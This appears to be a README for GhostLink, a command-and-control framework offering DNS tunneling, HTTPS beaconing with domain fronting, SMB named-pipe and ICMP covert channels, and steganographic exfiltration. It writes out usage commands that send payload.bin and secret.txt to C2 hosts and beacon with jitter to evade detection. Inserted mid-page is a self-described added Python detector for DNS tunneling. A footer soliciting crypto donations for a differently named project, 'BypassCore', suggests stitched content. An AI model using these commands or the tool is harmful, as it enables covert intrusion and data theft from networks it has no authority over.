GhostLink

Covert C2 Communication and Channel Research Framework

GhostLink is a research framework for studying covert communication channels used in red team operations. It implements various C2 channel techniques including DNS tunneling, HTTPS beaconing, named pipe communication, and steganographic data exfiltration.

Disclaimer: This tool is intended for authorized security research, penetration testing, and educational purposes only. Use of this software against systems without explicit authorization is illegal and unethical. The authors are not responsible for any misuse.

Features

  • DNS Tunneling — Encode data in DNS queries/responses (TXT, CNAME, A records, CNAME chaining)
  • HTTPS Beaconing — Malleable C2 profiles, domain fronting, configurable jitter
  • Named Pipe Channel — Local/remote SMB pipe communication with impersonation and SMB3 encryption
  • ICMP Covert Channel — Data hidden in ICMP echo payloads with fragmentation
  • Steganographic Encoding — LSB image embedding (BMP) with scatter mode
  • Encryption — AES-256-GCM and ChaCha20-Poly1305
  • Channel Manager — Multi-channel failover, round-robin, priority-based selection
  • Traffic Analysis Resistance — Timing jitter, payload padding, dummy traffic generation

Architecture

+---------------------------------------------------+
|                   CLI / API                        |
+---------------------------------------------------+
|                Channel Manager                     |
|   (Failover, Round-Robin, Random, Least-Latency)  |
+---------------------------------------------------+
|     Protocol Codec        |    Encryption Layer    |
|  (Framing, Compression)   | (AES-GCM, ChaCha20)   |
+---------------------------------------------------+
|  DNS    | HTTPS  | Named  | ICMP   | Stego        |
|  Tunnel | Beacon | Pipe   | Covert | Encoding     |
+---------------------------------------------------+
|              OS Network / IPC Layer                |
+---------------------------------------------------+

Build

Requirements

  • CMake 3.16+
  • C++17 compiler (MSVC 2019+, GCC 9+, Clang 10+)
  • Windows SDK (for CNG crypto and WinHTTP)

Build Instructions

mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release

Run Tests

cd build
ctest --output-on-failure

Usage

Generate Encryption Keys

ghostlink keygen

DNS Tunnel

# Start listener
ghostlink listen -t dns -d data.example.com --verbose

# Connect and send data
ghostlink connect -t dns -h 8.8.8.8 -d c2.example.com -i payload.bin
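
Defender-side view of the DNS channel above, as an added example that is not part of GhostLink or its documentation: a Python check over resolver query logs that flags zones receiving many distinct, long, high-entropy labels, the pattern that Base32-encoded data in query names produces. The thresholds, the two-label zone split and the sample log are assumptions constructed for illustration; this page does not describe GhostLink's wire format.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict
from statistics import mean, median

def shannon_entropy(s):
    """Bits per character of the empirical character distribution of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def split_zone(qname, zone_labels=2):
    """Split a query name into (subdomain labels, zone). Assumption: the zone is the
    last `zone_labels` labels; production code should use the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[:-zone_labels], ".".join(labels[-zone_labels:])

def suspicious_zones(qnames, min_unique=20, min_label_len=24, min_entropy=3.5):
    """Return {zone: stats} for zones whose queries look like encoded payloads:
    many distinct subdomains, long labels, near-random character distribution."""
    per_zone = defaultdict(set)
    for q in qnames:
        sub, zone = split_zone(q)
        if sub:
            per_zone[zone].add(max(sub, key=len))  # longest label carries the data
    flagged = {}
    for zone, labels in per_zone.items():
        med_len = median(len(l) for l in labels)
        avg_ent = mean(shannon_entropy(l) for l in labels)
        if len(labels) >= min_unique and med_len >= min_label_len and avg_ent >= min_entropy:
            flagged[zone] = {"unique": len(labels), "median_len": med_len,
                             "mean_entropy": round(avg_ent, 2)}
    return flagged

def constructed_sample():
    """Constructed query log: Base32-labelled queries under data.example.com
    (the domain in the usage text) mixed with ordinary lookups."""
    tunnel = []
    for i in range(40):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).digest()[:30]
        label = base64.b32encode(chunk).decode().lower()  # 48 chars, no padding
        tunnel.append(f"{label}.data.example.com.")
    benign = [f"host{i:02d}.corp.example.net" for i in range(30)]
    benign += ["www.example.org", "mail.example.org", "api.example.org"]
    return tunnel + benign

if __name__ == "__main__":
    for zone, stats in suspicious_zones(constructed_sample()).items():
        print(zone, stats)
```

All three conditions must hold together: a zone with many short hostnames, or a single long random-looking CDN name, is not flagged on its own.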

HTTPS Beacon

# Connect with jitter
ghostlink connect -t https -h c2server.com -p 443 --sleep 30000 --jitter 40

# With domain fronting
ghostlink connect -t https -h cdn.legit.com -p 443 --profile fronting

Named Pipe

# Local pipe listener
ghostlink listen -t pipe -n ghostlink_c2

# Remote pipe via SMB
ghostlink connect -t pipe -h 192.168.1.100 -n ghostlink_c2

ICMP Covert Channel

ghostlink connect -t icmp -h 10.0.0.1 -i secret.txt

Steganographic Encoding

ghostlink encode -i secret.txt -o cover.bmp --type stego

Bidirectional Tunnel

ghostlink tunnel -t dns -h resolver.example.com -d tunnel.example.com

Self-Test

ghostlink test --verbose

Project Structure

ghostlink/
├── src/
│   ├── core/
│   │   ├── channel.h            # Abstract channel interface
│   │   ├── channel_manager.h    # Multi-channel orchestration
│   │   ├── channel_manager.cpp
│   │   ├── crypto.h             # Encryption layer
│   │   ├── crypto.cpp
│   │   ├── protocol.h           # Wire protocol
│   │   └── protocol.cpp
│   ├── channels/
│   │   ├── dns_tunnel.h/.cpp    # DNS tunneling
│   │   ├── https_beacon.h/.cpp  # HTTPS beaconing
│   │   ├── named_pipe.h/.cpp    # Named pipe channel
│   │   └── icmp_channel.h/.cpp  # ICMP covert channel
│   ├── encoding/
│   │   ├── base32.h/.cpp        # Base32 encoding
│   │   └── steganography.h/.cpp # LSB image encoding
│   ├── utils/
│   │   └── jitter.h/.cpp        # Timing jitter utilities
│   └── main.cpp                 # CLI entry point
├── tests/
│   ├── test_crypto.cpp          # Crypto unit tests
│   └── test_dns_encoding.cpp    # DNS encoding tests
├── docs/
│   ├── channel-architecture.md
│   └── covert-channels-overview.md
├── CMakeLists.txt
├── LICENSE
└── README.md

Contact

Support

Help keep BypassCore open-source and independent.

USDT / USDC / ETH / BNB accepted on all networks.

License

MIT License - see LICENSE for details.